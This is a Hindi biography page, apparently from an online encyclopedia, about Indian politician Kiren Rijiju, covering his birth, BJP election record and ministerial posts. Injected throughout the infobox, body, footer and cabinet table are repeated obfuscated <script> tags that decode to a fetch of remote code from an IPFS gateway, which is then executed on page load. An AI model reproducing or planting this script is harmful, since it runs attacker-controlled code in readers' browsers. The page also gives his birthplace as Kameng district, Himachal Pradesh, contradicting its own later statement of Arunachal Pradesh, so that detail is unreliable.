किरण रिजिजू
किरण रिजिजू
| |
पूरा नाम | किरण रिजिजू |
जन्म | 19 नवंबर, 1971 |
जन्म भूमि | कामेंग ज़िला, हिमाचल प्रदेश |
अभिभावक | पिता- रिन्चिन खारू माता- चिरई रिजिजू |
नागरिकता | भारतीय |
प्रसिद्धि | राजनीतिज्ञ |
पार्टी | भारतीय जनता पार्टी |
कार्य काल | क़ानून और न्याय मंत्री- 7 जुलाई, 2021 से युवा मामले और खेल, राज्य मंत्री- 30 मई, 2019 से 7 जुलाई, 2021 तक |
अन्य जानकारी | 2004 में किरण रिजिजू अरुणाचल पश्चिम से लोकसभा का टिकट दिया गया था और वह पहली बार सांसद बने। |
अद्यतन | 15:43, 11 जुलाई 2021 (IST) <script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script><script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>
|
<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>किरण रिजिजू (अंग्रेज़ी: Kiren Rijiju, जन्म- 19 नवंबर, 1971, कामेंग ज़िला, हिमाचल प्रदेश) भारतीय जनता पार्टी के कद्दावर नेता हैं। वह भाजपा के उन नेताओं में से हैं, जिन्होंने नॉर्थ ईस्ट में भारतीय जनता पार्टी को सीट दिलाई। 17वीं लोकसभा में उन्हें 'युवा मामले, खेल और अल्पसंख्यक मंत्री' बनाया गया था, किन्तु 7 जुलाई, 2021 को प्रधानमंत्री नरेन्द्र मोदी के मंत्रिमण्डल में विस्तार और फेरबदल के बाद किरण रिजिजू को अब 'क़ानून और न्याय मंत्रालय' का दायित्व दिया गया है। किरण रिजिजू की कोशिश रहती है कि इस इलाके के साथ पहले जिस तरह का भेदभाव हुआ, वह अब न हो। अरुणाचल पश्चिम से भाजपा ने किरण रिजिजू पर दांव लगाया था और उन्होंने 1,74,843 मतों के अंतर से चुनाव जीता। यहां से किरण रिजिजू को 2,25,796 वोट मिले, जबकि उनके प्रतिद्वंद्वी कांग्रेस उम्मीदवार नबम तुकी को महज 50,953 वोट ही मिले। उन्हें 2014 में बनी मोदी सरकार में केन्द्रीय गृह राज्य मंत्री बनाया गया था।
- किरण रिजिजू ने दिल्ली से स्नातक और कानून की पढ़ाई पूरी की। पार्टी में उनके योगदान को देखते हुए अरुणाचल प्रदेश से सांसद चुने जाने के बाद प्रधानमंत्री नरेंद्र मोदी ने उन्हें गृह राज्यमंत्री जैसी महत्वपूर्ण जिम्मेदारी दी गई।
- 19 नवंबर, 1971 को किरण रिजिजू का जन्म अरुणाचल प्रदेश के पश्चिमी कामेंग जिले के नफ्रा में हुआ था। उनके पिता रिन्चिन खारू जाने माने नेता रहे हैं। उनकी माता का नाम चिरई रिजिजू है।
- किरण रिजिजू अरुणाचल पश्चिम लोकसभा से 16वीं लोकसभा के लिए सांसद चुने गए थे, उन्होंने कांग्रेस के उम्मीदवार को हराया था।
- चौदहवीं लोकसभा के लिए भी किरण रिजिजू सांसद चुने गए थे।
- 2004 में उन्हें अरुणाचल पश्चिम से लोकसभा का टिकट दिया गया और वह पहली बार सांसद बने।
- संसद में अपनी हाजिरी और कामकाज से उन्होंने बड़े नेताओं का दिल जीत लिया। उन्हें कई समितियों का सदस्य बनाया गया।
- 2009 में वह चुनाव हार गए थे, लेकिन 2014 के लोकसभा चुनाव में किरण रिजिजू ने एक बार फिर विजय हासिल की और सांसद बन गए।
- किरण रिजिजू ने दिल्ली एनसीआर में नॉर्थ ईस्ट के लोगों के साथ हो रहे भेदभाव के खिलाफ भी मजबूत आवाज उठाई। 2014 में सरकार में शामिल होने के बाद उन्होंने नॉर्थ ईस्ट के लोगों से जुड़ी समस्याओं पर सुझाव देने के लिए बेजबरुआ कमेटी बनाई।
|
|
|
|
|
<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script> <script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>
टीका टिप्पणी और संदर्भ
संबंधित लेख
नरेन्द्र मोदी का कैबिनेट मंत्रिमण्डल
क्रमांक | मंत्री नाम | मंत्रालय |
---|
<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>
<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>
<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>